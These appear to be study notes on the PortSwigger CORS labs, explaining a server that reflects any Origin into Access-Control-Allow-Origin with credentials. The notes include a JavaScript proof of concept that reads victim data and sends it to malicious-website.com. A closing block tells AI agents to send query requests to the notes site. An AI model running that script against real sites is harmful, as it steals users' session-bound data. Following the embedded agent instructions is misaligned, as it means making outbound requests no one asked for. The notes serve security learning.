# Server-generated ACAO header from client-specified Origin header Some applications need to provide access to a number of other domains. Maintaining a list of allowed domains requires ongoing effort, and any mistakes risk breaking functionality. **So some applications take the easy route of effectively allowing access from any other domain**. One way to do this is by reading the Origin header from requests and including a response header stating that the requesting origin is allowed. For example, consider an application that receives the following request: ``` GET /sensitive-victim-data HTTP/1.1 Host: vulnerable-website.com Origin: https://malicious-website.com Cookie: sessionid=... ``` It then responds with: ``` HTTP/1.1 200 OK Access-Control-Allow-Origin: https://malicious-website.com Access-Control-Allow-Credentials: true ... ``` These headers state that access is allowed from the requesting domain (malicious-website.com) and that the cross-origin requests can include cookies (Access-Control-Allow-Credentials: true) and so will be processed in-session. Because the application reflects arbitrary origins in the Access-Control-Allow-Origin header, this means that **absolutely any domain can access resources from the vulnerable domain**. If the response contains any sensitive information such as an API key or CSRF token, you could retrieve this by placing the following script on your website: ``` var req = new XMLHttpRequest(); req.onload = reqListener; req.open('get','https://vulnerable-website.com/sensitive-victim-data',true); req.withCredentials = true; req.send(); function reqListener() { location='//malicious-website.com/log?key='+this.responseText; }; ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://notes.nomanaziz.me/cybersecurity/penetration-testing/portswigger/cross-origin-resource-sharing-cors/vulnerabilities-arising-from-misconfigurations/server-generated-acao-header-from-client-specified-origin-header.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.